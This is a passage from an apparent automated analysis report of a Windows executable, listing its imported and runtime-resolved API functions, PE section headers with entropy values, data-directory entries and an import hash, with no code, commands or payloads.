  1920. "address": "0x476698"
  1921. },
  1922. {
  1923. "name": "GetCapture",
  1924. "address": "0x47669c"
  1925. },
  1926. {
  1927. "name": "GetActiveWindow",
  1928. "address": "0x4766a0"
  1929. },
  1930. {
  1931. "name": "FrameRect",
  1932. "address": "0x4766a4"
  1933. },
  1934. {
  1935. "name": "FindWindowA",
  1936. "address": "0x4766a8"
  1937. },
  1938. {
  1939. "name": "FillRect",
  1940. "address": "0x4766ac"
  1941. },
  1942. {
  1943. "name": "EqualRect",
  1944. "address": "0x4766b0"
  1945. },
  1946. {
  1947. "name": "EnumWindows",
  1948. "address": "0x4766b4"
  1949. },
  1950. {
  1951. "name": "EnumThreadWindows",
  1952. "address": "0x4766b8"
  1953. },
  1954. {
  1955. "name": "EndPaint",
  1956. "address": "0x4766bc"
  1957. },
  1958. {
  1959. "name": "EnableWindow",
  1960. "address": "0x4766c0"
  1961. },
  1962. {
  1963. "name": "EnableScrollBar",
  1964. "address": "0x4766c4"
  1965. },
  1966. {
  1967. "name": "EnableMenuItem",
  1968. "address": "0x4766c8"
  1969. },
  1970. {
  1971. "name": "DrawTextA",
  1972. "address": "0x4766cc"
  1973. },
  1974. {
  1975. "name": "DrawMenuBar",
  1976. "address": "0x4766d0"
  1977. },
  1978. {
  1979. "name": "DrawIconEx",
  1980. "address": "0x4766d4"
  1981. },
  1982. {
  1983. "name": "DrawIcon",
  1984. "address": "0x4766d8"
  1985. },
  1986. {
  1987. "name": "DrawFrameControl",
  1988. "address": "0x4766dc"
  1989. },
  1990. {
  1991. "name": "DrawEdge",
  1992. "address": "0x4766e0"
  1993. },
  1994. {
  1995. "name": "DispatchMessageA",
  1996. "address": "0x4766e4"
  1997. },
  1998. {
  1999. "name": "DestroyWindow",
  2000. "address": "0x4766e8"
  2001. },
  2002. {
  2003. "name": "DestroyMenu",
  2004. "address": "0x4766ec"
  2005. },
  2006. {
  2007. "name": "DestroyIcon",
  2008. "address": "0x4766f0"
  2009. },
  2010. {
  2011. "name": "DestroyCursor",
  2012. "address": "0x4766f4"
  2013. },
  2014. {
  2015. "name": "DeleteMenu",
  2016. "address": "0x4766f8"
  2017. },
  2018. {
  2019. "name": "DefWindowProcA",
  2020. "address": "0x4766fc"
  2021. },
  2022. {
  2023. "name": "DefMDIChildProcA",
  2024. "address": "0x476700"
  2025. },
  2026. {
  2027. "name": "DefFrameProcA",
  2028. "address": "0x476704"
  2029. },
  2030. {
  2031. "name": "CreatePopupMenu",
  2032. "address": "0x476708"
  2033. },
  2034. {
  2035. "name": "CreateMenu",
  2036. "address": "0x47670c"
  2037. },
  2038. {
  2039. "name": "CreateIcon",
  2040. "address": "0x476710"
  2041. },
  2042. {
  2043. "name": "ClientToScreen",
  2044. "address": "0x476714"
  2045. },
  2046. {
  2047. "name": "CheckMenuItem",
  2048. "address": "0x476718"
  2049. },
  2050. {
  2051. "name": "CallWindowProcA",
  2052. "address": "0x47671c"
  2053. },
  2054. {
  2055. "name": "CallNextHookEx",
  2056. "address": "0x476720"
  2057. },
  2058. {
  2059. "name": "BeginPaint",
  2060. "address": "0x476724"
  2061. },
  2062. {
  2063. "name": "CharNextA",
  2064. "address": "0x476728"
  2065. },
  2066. {
  2067. "name": "CharLowerBuffA",
  2068. "address": "0x47672c"
  2069. },
  2070. {
  2071. "name": "CharLowerA",
  2072. "address": "0x476730"
  2073. },
  2074. {
  2075. "name": "CharToOemA",
  2076. "address": "0x476734"
  2077. },
  2078. {
  2079. "name": "AdjustWindowRectEx",
  2080. "address": "0x476738"
  2081. },
  2082. {
  2083. "name": "ActivateKeyboardLayout",
  2084. "address": "0x47673c"
  2085. }
  2086. ],
  2087. "dll": "user32.dll"
  2088. },
  2089. {
  2090. "imports": [
  2091. {
  2092. "name": "Sleep",
  2093. "address": "0x476744"
  2094. }
  2095. ],
  2096. "dll": "kernel32.dll"
  2097. },
  2098. {
  2099. "imports": [
  2100. {
  2101. "name": "SafeArrayPtrOfIndex",
  2102. "address": "0x47674c"
  2103. },
  2104. {
  2105. "name": "SafeArrayGetUBound",
  2106. "address": "0x476750"
  2107. },
  2108. {
  2109. "name": "SafeArrayGetLBound",
  2110. "address": "0x476754"
  2111. },
  2112. {
  2113. "name": "SafeArrayCreate",
  2114. "address": "0x476758"
  2115. },
  2116. {
  2117. "name": "VariantChangeType",
  2118. "address": "0x47675c"
  2119. },
  2120. {
  2121. "name": "VariantCopy",
  2122. "address": "0x476760"
  2123. },
  2124. {
  2125. "name": "VariantClear",
  2126. "address": "0x476764"
  2127. },
  2128. {
  2129. "name": "VariantInit",
  2130. "address": "0x476768"
  2131. }
  2132. ],
  2133. "dll": "oleaut32.dll"
  2134. },
  2135. {
  2136. "imports": [
  2137. {
  2138. "name": "CreateStreamOnHGlobal",
  2139. "address": "0x476770"
  2140. },
  2141. {
  2142. "name": "IsAccelerator",
  2143. "address": "0x476774"
  2144. },
  2145. {
  2146. "name": "OleDraw",
  2147. "address": "0x476778"
  2148. },
  2149. {
  2150. "name": "OleSetMenuDescriptor",
  2151. "address": "0x47677c"
  2152. },
  2153. {
  2154. "name": "CoCreateInstance",
  2155. "address": "0x476780"
  2156. },
  2157. {
  2158. "name": "CoGetClassObject",
  2159. "address": "0x476784"
  2160. },
  2161. {
  2162. "name": "CoUninitialize",
  2163. "address": "0x476788"
  2164. },
  2165. {
  2166. "name": "CoInitialize",
  2167. "address": "0x47678c"
  2168. },
  2169. {
  2170. "name": "IsEqualGUID",
  2171. "address": "0x476790"
  2172. }
  2173. ],
  2174. "dll": "ole32.dll"
  2175. },
  2176. {
  2177. "imports": [
  2178. {
  2179. "name": "GetErrorInfo",
  2180. "address": "0x476798"
  2181. },
  2182. {
  2183. "name": "SysFreeString",
  2184. "address": "0x47679c"
  2185. }
  2186. ],
  2187. "dll": "oleaut32.dll"
  2188. },
  2189. {
  2190. "imports": [
  2191. {
  2192. "name": "ImageList_SetIconSize",
  2193. "address": "0x4767a4"
  2194. },
  2195. {
  2196. "name": "ImageList_GetIconSize",
  2197. "address": "0x4767a8"
  2198. },
  2199. {
  2200. "name": "ImageList_Write",
  2201. "address": "0x4767ac"
  2202. },
  2203. {
  2204. "name": "ImageList_Read",
  2205. "address": "0x4767b0"
  2206. },
  2207. {
  2208. "name": "ImageList_GetDragImage",
  2209. "address": "0x4767b4"
  2210. },
  2211. {
  2212. "name": "ImageList_DragShowNolock",
  2213. "address": "0x4767b8"
  2214. },
  2215. {
  2216. "name": "ImageList_SetDragCursorImage",
  2217. "address": "0x4767bc"
  2218. },
  2219. {
  2220. "name": "ImageList_DragMove",
  2221. "address": "0x4767c0"
  2222. },
  2223. {
  2224. "name": "ImageList_DragLeave",
  2225. "address": "0x4767c4"
  2226. },
  2227. {
  2228. "name": "ImageList_DragEnter",
  2229. "address": "0x4767c8"
  2230. },
  2231. {
  2232. "name": "ImageList_EndDrag",
  2233. "address": "0x4767cc"
  2234. },
  2235. {
  2236. "name": "ImageList_BeginDrag",
  2237. "address": "0x4767d0"
  2238. },
  2239. {
  2240. "name": "ImageList_Remove",
  2241. "address": "0x4767d4"
  2242. },
  2243. {
  2244. "name": "ImageList_DrawEx",
  2245. "address": "0x4767d8"
  2246. },
  2247. {
  2248. "name": "ImageList_Draw",
  2249. "address": "0x4767dc"
  2250. },
  2251. {
  2252. "name": "ImageList_GetBkColor",
  2253. "address": "0x4767e0"
  2254. },
  2255. {
  2256. "name": "ImageList_SetBkColor",
  2257. "address": "0x4767e4"
  2258. },
  2259. {
  2260. "name": "ImageList_ReplaceIcon",
  2261. "address": "0x4767e8"
  2262. },
  2263. {
  2264. "name": "ImageList_Add",
  2265. "address": "0x4767ec"
  2266. },
  2267. {
  2268. "name": "ImageList_GetImageCount",
  2269. "address": "0x4767f0"
  2270. },
  2271. {
  2272. "name": "ImageList_Destroy",
  2273. "address": "0x4767f4"
  2274. },
  2275. {
  2276. "name": "ImageList_Create",
  2277. "address": "0x4767f8"
  2278. }
  2279. ],
  2280. "dll": "comctl32.dll"
  2281. },
  2282. {
  2283. "imports": [
  2284. {
  2285. "name": "OpenPrinterA",
  2286. "address": "0x476800"
  2287. },
  2288. {
  2289. "name": "EnumPrintersA",
  2290. "address": "0x476804"
  2291. },
  2292. {
  2293. "name": "DocumentPropertiesA",
  2294. "address": "0x476808"
  2295. },
  2296. {
  2297. "name": "ClosePrinter",
  2298. "address": "0x47680c"
  2299. }
  2300. ],
  2301. "dll": "winspool.drv"
  2302. },
  2303. {
  2304. "imports": [
  2305. {
  2306. "name": "PrintDlgA",
  2307. "address": "0x476814"
  2308. }
  2309. ],
  2310. "dll": "comdlg32.dll"
  2311. }
  2312. ],
  2313. "digital_signers": null,
  2314. "exported_dll_name": null,
  2315. "actual_checksum": "0x000c8491",
  2316. "overlay": null,
  2317. "imagebase": "0x00400000",
  2318. "reported_checksum": "0x00000000",
  2319. "icon_hash": null,
  2320. "entrypoint": "0x0046a7a0",
  2321. "timestamp": "1992-01-19 17:30:04",
  2322. "osversion": "4.0",
  2323. "sections": [
  2324. {
  2325. "name": "CODE",
  2326. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
  2327. "virtual_address": "0x00001000",
  2328. "size_of_data": "0x00069800",
  2329. "entropy": "6.53",
  2330. "raw_address": "0x00000400",
  2331. "virtual_size": "0x000697e8",
  2332. "characteristics_raw": "0x60000020"
  2333. },
  2334. {
  2335. "name": "DATA",
  2336. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  2337. "virtual_address": "0x0006b000",
  2338. "size_of_data": "0x00009e00",
  2339. "entropy": "5.04",
  2340. "raw_address": "0x00069c00",
  2341. "virtual_size": "0x00009ca8",
  2342. "characteristics_raw": "0xc0000040"
  2343. },
  2344. {
  2345. "name": "BSS",
  2346. "characteristics": "IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  2347. "virtual_address": "0x00075000",
  2348. "size_of_data": "0x00000000",
  2349. "entropy": "0.00",
  2350. "raw_address": "0x00073a00",
  2351. "virtual_size": "0x00000fa9",
  2352. "characteristics_raw": "0xc0000000"
  2353. },
  2354. {
  2355. "name": ".idata",
  2356. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  2357. "virtual_address": "0x00076000",
  2358. "size_of_data": "0x00002600",
  2359. "entropy": "4.83",
  2360. "raw_address": "0x00073a00",
  2361. "virtual_size": "0x000024c6",
  2362. "characteristics_raw": "0xc0000040"
  2363. },
  2364. {
  2365. "name": ".tls",
  2366. "characteristics": "IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  2367. "virtual_address": "0x00079000",
  2368. "size_of_data": "0x00000000",
  2369. "entropy": "0.00",
  2370. "raw_address": "0x00076000",
  2371. "virtual_size": "0x00000010",
  2372. "characteristics_raw": "0xc0000000"
  2373. },
  2374. {
  2375. "name": ".rdata",
  2376. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
  2377. "virtual_address": "0x0007a000",
  2378. "size_of_data": "0x00000200",
  2379. "entropy": "0.21",
  2380. "raw_address": "0x00076000",
  2381. "virtual_size": "0x00000018",
  2382. "characteristics_raw": "0x50000040"
  2383. },
  2384. {
  2385. "name": ".reloc",
  2386. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
  2387. "virtual_address": "0x0007b000",
  2388. "size_of_data": "0x00008400",
  2389. "entropy": "6.65",
  2390. "raw_address": "0x00076200",
  2391. "virtual_size": "0x000083a4",
  2392. "characteristics_raw": "0x50000040"
  2393. },
  2394. {
  2395. "name": ".rsrc",
  2396. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
  2397. "virtual_address": "0x00084000",
  2398. "size_of_data": "0x00042200",
  2399. "entropy": "7.38",
  2400. "raw_address": "0x0007e600",
  2401. "virtual_size": "0x00042144",
  2402. "characteristics_raw": "0x50000040"
  2403. }
  2404. ],
  2405. "resources": [],
  2406. "dirents": [
  2407. {
  2408. "virtual_address": "0x00000000",
  2409. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  2410. "size": "0x00000000"
  2411. },
  2412. {
  2413. "virtual_address": "0x00076000",
  2414. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  2415. "size": "0x000024c6"
  2416. },
  2417. {
  2418. "virtual_address": "0x00084000",
  2419. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  2420. "size": "0x00042144"
  2421. },
  2422. {
  2423. "virtual_address": "0x00000000",
  2424. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  2425. "size": "0x00000000"
  2426. },
  2427. {
  2428. "virtual_address": "0x00000000",
  2429. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  2430. "size": "0x00000000"
  2431. },
  2432. {
  2433. "virtual_address": "0x0007b000",
  2434. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  2435. "size": "0x000083a4"
  2436. },
  2437. {
  2438. "virtual_address": "0x00000000",
  2439. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  2440. "size": "0x00000000"
  2441. },
  2442. {
  2443. "virtual_address": "0x00000000",
  2444. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  2445. "size": "0x00000000"
  2446. },
  2447. {
  2448. "virtual_address": "0x00000000",
  2449. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  2450. "size": "0x00000000"
  2451. },
  2452. {
  2453. "virtual_address": "0x0007a000",
  2454. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  2455. "size": "0x00000018"
  2456. },
  2457. {
  2458. "virtual_address": "0x00000000",
  2459. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  2460. "size": "0x00000000"
  2461. },
  2462. {
  2463. "virtual_address": "0x00000000",
  2464. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  2465. "size": "0x00000000"
  2466. },
  2467. {
  2468. "virtual_address": "0x00000000",
  2469. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  2470. "size": "0x00000000"
  2471. },
  2472. {
  2473. "virtual_address": "0x00000000",
  2474. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  2475. "size": "0x00000000"
  2476. },
  2477. {
  2478. "virtual_address": "0x00000000",
  2479. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  2480. "size": "0x00000000"
  2481. },
  2482. {
  2483. "virtual_address": "0x00000000",
  2484. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  2485. "size": "0x00000000"
  2486. }
  2487. ],
  2488. "exports": [],
  2489. "guest_signers": {},
  2490. "imphash": "d553c8d26e9a2369ccc8481987fa6051",
  2491. "icon_fuzzy": null,
  2492. "icon": null,
  2493. "pdbpath": null,
  2494. "imported_dll_count": 17,
  2495. "versioninfo": []
  2496. }
  2497. }
  2498.  
  2499. [*] Resolved APIs: [
  2500. "kernel32.dll.GetDiskFreeSpaceExA",
  2501. "oleaut32.dll.VariantChangeTypeEx",
  2502. "oleaut32.dll.VarNeg",
  2503. "oleaut32.dll.VarNot",
  2504. "oleaut32.dll.VarAdd",
  2505. "oleaut32.dll.VarSub",
  2506. "oleaut32.dll.VarMul",
  2507. "oleaut32.dll.VarDiv",
  2508. "oleaut32.dll.VarIdiv",
  2509. "oleaut32.dll.VarMod",
  2510. "oleaut32.dll.VarAnd",
  2511. "oleaut32.dll.VarOr",
  2512. "oleaut32.dll.VarXor",
  2513. "oleaut32.dll.VarCmp",
  2514. "oleaut32.dll.VarI4FromStr",
  2515. "oleaut32.dll.VarR4FromStr",
  2516. "oleaut32.dll.VarR8FromStr",
  2517. "oleaut32.dll.VarDateFromStr",
  2518. "oleaut32.dll.VarCyFromStr",
  2519. "oleaut32.dll.VarBoolFromStr",
  2520. "oleaut32.dll.VarBstrFromCy",
  2521. "oleaut32.dll.VarBstrFromDate",
  2522. "oleaut32.dll.VarBstrFromBool",
  2523. "user32.dll.GetMonitorInfoA",
  2524. "user32.dll.GetSystemMetrics",
  2525. "user32.dll.EnumDisplayMonitors",
  2526. "dwmapi.dll.DwmIsCompositionEnabled",
  2527. "gdi32.dll.GetLayout",
  2528. "gdi32.dll.GdiRealizationInfo",
  2529. "gdi32.dll.FontIsLinked",
  2530. "advapi32.dll.RegOpenKeyExW",
  2531. "advapi32.dll.RegQueryInfoKeyW",
  2532. "gdi32.dll.GetTextFaceAliasW",
  2533. "advapi32.dll.RegEnumValueW",
  2534. "advapi32.dll.RegCloseKey",
  2535. "advapi32.dll.RegQueryValueExW",
  2536. "gdi32.dll.GetFontAssocStatus",
  2537. "advapi32.dll.RegQueryValueExA",
  2538. "advapi32.dll.RegEnumKeyExW",
  2539. "gdi32.dll.GdiIsMetaPrintDC",
  2540. "user32.dll.AnimateWindow",
  2541. "comctl32.dll.InitializeFlatSB",
  2542. "comctl32.dll.UninitializeFlatSB",
  2543. "comctl32.dll.FlatSB_GetScrollProp",
  2544. "comctl32.dll.FlatSB_SetScrollProp",
  2545. "comctl32.dll.FlatSB_EnableScrollBar",
  2546. "comctl32.dll.FlatSB_ShowScrollBar",
  2547. "comctl32.dll.FlatSB_GetScrollRange",
  2548. "comctl32.dll.FlatSB_GetScrollInfo",
  2549. "comctl32.dll.FlatSB_GetScrollPos",
  2550. "comctl32.dll.FlatSB_SetScrollPos",
  2551. "comctl32.dll.FlatSB_SetScrollInfo",
  2552. "comctl32.dll.FlatSB_SetScrollRange",
  2553. "user32.dll.SetLayeredWindowAttributes",
  2554. "ole32.dll.CoCreateInstanceEx",
  2555. "ole32.dll.CoInitializeEx",
  2556. "ole32.dll.CoAddRefServerProcess",
  2557. "ole32.dll.CoReleaseServerProcess",
  2558. "ole32.dll.CoResumeClassObjects",
  2559. "ole32.dll.CoSuspendClassObjects",
  2560. "olepro32.dll.OleCreatePropertyFrame",
  2561. "olepro32.dll.OleCreateFontIndirect",
  2562. "olepro32.dll.OleCreatePictureIndirect",
  2563. "olepro32.dll.OleLoadPicture",
  2564. "kernel32.dll.GetModuleHandleW",
  2565. "kernel32.dll.VirtualFree",
  2566. "kernel32.dll.LoadLibraryW",
  2567. "kernel32.dll.SizeofResource",
  2568. "kernel32.dll.GetModuleFileNameW",
  2569. "kernel32.dll.CreateFileW",
  2570. "kernel32.dll.MultiByteToWideChar",
  2571. "kernel32.dll.FlushInstructionCache",
  2572. "kernel32.dll.GetCurrentProcess",
  2573. "kernel32.dll.VirtualAlloc",
  2574. "kernel32.dll.LoadLibraryA",
  2575. "kernel32.dll.GetModuleFileNameA",
  2576. "kernel32.dll.GetModuleHandleA",
  2577. "kernel32.dll.VirtualProtect",
  2578. "kernel32.dll.CloseHandle",
  2579. "kernel32.dll.LoadResource",
  2580. "kernel32.dll.FindResourceW",
  2581. "kernel32.dll.GetProcAddress",
  2582. "kernel32.dll.GetFileSize",
  2583. "kernel32.dll.LCMapStringW",
  2584. "kernel32.dll.LCMapStringA",
  2585. "kernel32.dll.GetStringTypeW",
  2586. "kernel32.dll.GetStringTypeA",
  2587. "kernel32.dll.HeapAlloc",
  2588. "kernel32.dll.GetStartupInfoW",
  2589. "kernel32.dll.DeleteCriticalSection",
  2590. "kernel32.dll.LeaveCriticalSection",
  2591. "kernel32.dll.EnterCriticalSection",
  2592. "kernel32.dll.HeapFree",
  2593. "kernel32.dll.HeapReAlloc",
  2594. "kernel32.dll.HeapCreate",
  2595. "kernel32.dll.Sleep",
  2596. "kernel32.dll.ExitProcess",
  2597. "kernel32.dll.WriteFile",
  2598. "kernel32.dll.GetStdHandle",
  2599. "kernel32.dll.SetUnhandledExceptionFilter",
  2600. "kernel32.dll.FreeEnvironmentStringsW",
  2601. "kernel32.dll.GetEnvironmentStringsW",
  2602. "kernel32.dll.GetCommandLineW",
  2603. "kernel32.dll.SetHandleCount",
  2604. "kernel32.dll.GetFileType",
  2605. "kernel32.dll.GetStartupInfoA",
  2606. "kernel32.dll.TlsGetValue",
  2607. "kernel32.dll.TlsAlloc",
  2608. "kernel32.dll.TlsSetValue",
  2609. "kernel32.dll.TlsFree",
  2610. "kernel32.dll.InterlockedIncrement",
  2611. "kernel32.dll.SetLastError",
  2612. "kernel32.dll.GetCurrentThreadId",
  2613. "kernel32.dll.GetLastError",
  2614. "kernel32.dll.InterlockedDecrement",
  2615. "kernel32.dll.QueryPerformanceCounter",
  2616. "kernel32.dll.GetTickCount",
  2617. "kernel32.dll.GetCurrentProcessId",
  2618. "kernel32.dll.GetSystemTimeAsFileTime",
  2619. "kernel32.dll.InitializeCriticalSectionAndSpinCount",
  2620. "kernel32.dll.TerminateProcess",
  2621. "kernel32.dll.UnhandledExceptionFilter",
  2622. "kernel32.dll.IsDebuggerPresent",
  2623. "kernel32.dll.RtlUnwind",
  2624. "kernel32.dll.GetCPInfo",
  2625. "kernel32.dll.GetACP",
  2626. "kernel32.dll.GetOEMCP",
  2627. "kernel32.dll.IsValidCodePage",
  2628. "kernel32.dll.HeapSize",
  2629. "kernel32.dll.GetLocaleInfoA",
  2630. "kernel32.dll.WideCharToMultiByte",
  2631. "psapi.dll.GetModuleInformation",
  2632. "psapi.dll.GetModuleBaseNameW",
  2633. "psapi.dll.EnumProcessModules",
  2634. "shlwapi.dll.StrStrIW",
  2635. "shlwapi.dll.PathFileExistsW",
  2636. "kernel32.dll.FlsAlloc",
  2637. "kernel32.dll.FlsGetValue",
  2638. "kernel32.dll.FlsSetValue",
  2639. "kernel32.dll.FlsFree",
  2640. "mscoree.dll._CorExeMain",
  2641. "kernel32.dll.IsProcessorFeaturePresent",
  2642. "msvcrt.dll._set_error_mode",
  2643. "msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z",
  2644. "kernel32.dll.FindActCtxSectionStringW",
  2645. "kernel32.dll.GetSystemWindowsDirectoryW",
  2646. "mscoree.dll.GetProcessExecutableHeap",
  2647. "kernelbase.dll.InitializeCriticalSectionAndSpinCount",
  2648. "kernel32.dll.ProcessIdToSessionId",
  2649. "imm32.dll.ImmCreateContext",
  2650. "imm32.dll.ImmDestroyContext",
  2651. "imm32.dll.ImmNotifyIME",
  2652. "imm32.dll.ImmAssociateContext",
  2653. "imm32.dll.ImmReleaseContext",
  2654. "imm32.dll.ImmGetContext",
  2655. "imm32.dll.ImmGetCompositionStringA",
  2656. "imm32.dll.ImmSetCompositionStringA",
  2657. "imm32.dll.ImmGetCompositionStringW",
  2658. "imm32.dll.ImmSetCompositionStringW",
  2659. "imm32.dll.ImmSetCandidateWindow",
  2660. "mscorwks.dll.GetCLRFunction",
  2661. "mscoree.dll.IEE",
  2662. "kernel32.dll.QueryActCtxW",
  2663. "shlwapi.dll.UrlIsW",
  2664. "mscorwks.dll.IEE",
  2665. "ntdll.dll.ZwCreateSection",
  2666. "kernel32.dll.MapViewOfFile",
  2667. "kernel32.dll.LoadLibraryExW",
  2668. "mscorwks.dll._CorExeMain",
  2669. "advapi32.dll.RegisterTraceGuidsW",
  2670. "advapi32.dll.UnregisterTraceGuids",
  2671. "advapi32.dll.GetTraceLoggerHandle",
  2672. "advapi32.dll.GetTraceEnableLevel",
  2673. "advapi32.dll.GetTraceEnableFlags",
  2674. "advapi32.dll.TraceEvent",
  2675. "mscoree.dll.GetStartupFlags",
  2676. "mscoree.dll.GetHostConfigurationFile",
  2677. "mscoree.dll.GetCORSystemDirectory",
  2678. "ntdll.dll.RtlUnwind",
  2679. "kernel32.dll.IsWow64Process",
  2680. "advapi32.dll.AllocateAndInitializeSid",
  2681. "advapi32.dll.OpenProcessToken",
  2682. "advapi32.dll.GetTokenInformation",
  2683. "advapi32.dll.InitializeAcl",
  2684. "advapi32.dll.AddAccessAllowedAce",
  2685. "advapi32.dll.FreeSid",
  2686. "kernel32.dll.SetThreadStackGuarantee",
  2687. "kernel32.dll.AddVectoredContinueHandler",
  2688. "kernel32.dll.RemoveVectoredContinueHandler",
  2689. "advapi32.dll.ConvertSidToStringSidW",
  2690. "shell32.dll.SHGetFolderPathW",
  2691. "kernel32.dll.FlushProcessWriteBuffers",
  2692. "kernel32.dll.GetWriteWatch",
  2693. "kernel32.dll.ResetWriteWatch",
  2694. "kernel32.dll.CreateMemoryResourceNotification",
  2695. "kernel32.dll.QueryMemoryResourceNotification",
  2696. "mscoree.dll._CorImageUnloading",
  2697. "mscoree.dll._CorValidateImage",
  2698. "cryptbase.dll.SystemFunction036",
  2699. "uxtheme.dll.ThemeInitApiHook",
  2700. "user32.dll.IsProcessDPIAware",
  2701. "ole32.dll.CoGetContextToken",
  2702. "kernel32.dll.GetVersionExW",
  2703. "kernel32.dll.GetFullPathNameW",
  2704. "advapi32.dll.CryptAcquireContextA",
  2705. "advapi32.dll.CryptReleaseContext",
  2706. "advapi32.dll.CryptCreateHash",
  2707. "advapi32.dll.CryptDestroyHash",
  2708. "advapi32.dll.CryptHashData",
  2709. "advapi32.dll.CryptGetHashParam",
  2710. "advapi32.dll.CryptImportKey",
  2711. "advapi32.dll.CryptExportKey",
  2712. "advapi32.dll.CryptGenKey",
  2713. "advapi32.dll.CryptGetKeyParam",
  2714. "advapi32.dll.CryptDestroyKey",
  2715. "advapi32.dll.CryptVerifySignatureA",
  2716. "advapi32.dll.CryptSignHashA",
  2717. "advapi32.dll.CryptGetProvParam",
  2718. "advapi32.dll.CryptGetUserKey",
  2719. "advapi32.dll.CryptEnumProvidersA",
  2720. "mscoree.dll.GetMetaDataInternalInterface",
  2721. "mscorwks.dll.GetMetaDataInternalInterface",
  2722. "cryptsp.dll.CryptAcquireContextA",
  2723. "cryptsp.dll.CryptImportKey",
  2724. "cryptsp.dll.CryptCreateHash",
  2725. "cryptsp.dll.CryptHashData",
  2726. "cryptsp.dll.CryptVerifySignatureA",
  2727. "cryptsp.dll.CryptDestroyHash",
  2728. "cryptsp.dll.CryptDestroyKey",
  2729. "mscorjit.dll.getJit",
  2730. "kernel32.dll.lstrlen",
  2731. "kernel32.dll.lstrlenW",
  2732. "kernel32.dll.GetUserDefaultUILanguage",
  2733. "kernel32.dll.SetErrorMode",
  2734. "kernel32.dll.GetFileAttributesExW",
  2735. "bcrypt.dll.BCryptGetFipsAlgorithmMode",
  2736. "kernel32.dll.GetEnvironmentVariableW",
  2737. "cryptsp.dll.CryptAcquireContextW",
  2738. "ole32.dll.CreateBindCtx",
  2739. "ole32.dll.CoGetObjectContext",
  2740. "sechost.dll.LookupAccountNameLocalW",
  2741. "advapi32.dll.LookupAccountSidW",
  2742. "sechost.dll.LookupAccountSidLocalW",
  2743. "cryptsp.dll.CryptGenRandom",
  2744. "ole32.dll.NdrOleInitializeExtension",
  2745. "ole32.dll.CoGetClassObject",
  2746. "ole32.dll.CoGetMarshalSizeMax",
  2747. "ole32.dll.CoMarshalInterface",
  2748. "ole32.dll.CoUnmarshalInterface",
  2749. "ole32.dll.StringFromIID",
  2750. "ole32.dll.CoGetPSClsid",
  2751. "ole32.dll.CoTaskMemAlloc",
  2752. "ole32.dll.CoTaskMemFree",
  2753. "ole32.dll.CoCreateInstance",
  2754. "ole32.dll.CoReleaseMarshalData",
  2755. "ole32.dll.DcomChannelSetHResult",
  2756. "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
  2757. "ole32.dll.MkParseDisplayName",
  2758. "oleaut32.dll.#2",
  2759. "oleaut32.dll.#6",
  2760. "kernel32.dll.GetThreadPreferredUILanguages",
  2761. "kernel32.dll.SetThreadPreferredUILanguages",
  2762. "kernel32.dll.LocaleNameToLCID",
  2763. "kernel32.dll.GetLocaleInfoEx",
  2764. "kernel32.dll.LCIDToLocaleName",
  2765. "kernel32.dll.GetSystemDefaultLocaleName",
  2766. "ole32.dll.BindMoniker",
  2767. "sxs.dll.SxsOleAut32RedirectTypeLibrary",
  2768. "advapi32.dll.RegOpenKeyW",
  2769. "advapi32.dll.RegEnumKeyW",
  2770. "advapi32.dll.RegQueryValueW",
  2771. "sxs.dll.SxsOleAut32MapConfiguredClsidToReferenceClsid",
  2772. "sxs.dll.SxsLookupClrGuid",
  2773. "kernel32.dll.ReleaseActCtx",
  2774. "oleaut32.dll.#9",
  2775. "oleaut32.dll.#4",
  2776. "oleaut32.dll.#283",
  2777. "oleaut32.dll.#284",
  2778. "mscoree.dll.GetTokenForVTableEntry",
  2779. "mscoree.dll.SetTargetForVTableEntry",
  2780. "mscoree.dll.GetTargetForVTableEntry",
  2781. "kernel32.dll.LocalAlloc",
  2782. "oleaut32.dll.VariantInit",
  2783. "oleaut32.dll.VariantClear",
  2784. "oleaut32.dll.#7",
  2785. "kernel32.dll.CreateEventW",
  2786. "kernel32.dll.SwitchToThread",
  2787. "kernel32.dll.SetEvent",
  2788. "ole32.dll.CoWaitForMultipleHandles",
  2789. "ole32.dll.IIDFromString",
  2790. "wminet_utils.dll.ResetSecurity",
  2791. "wminet_utils.dll.SetSecurity",
  2792. "wminet_utils.dll.BlessIWbemServices",
  2793. "wminet_utils.dll.BlessIWbemServicesObject",
  2794. "wminet_utils.dll.GetPropertyHandle",
  2795. "wminet_utils.dll.WritePropertyValue",
  2796. "wminet_utils.dll.Clone",
  2797. "wminet_utils.dll.VerifyClientKey",
  2798. "wminet_utils.dll.GetQualifierSet",
  2799. "wminet_utils.dll.Get",
  2800. "wminet_utils.dll.Put",
  2801. "wminet_utils.dll.Delete",
  2802. "wminet_utils.dll.GetNames",
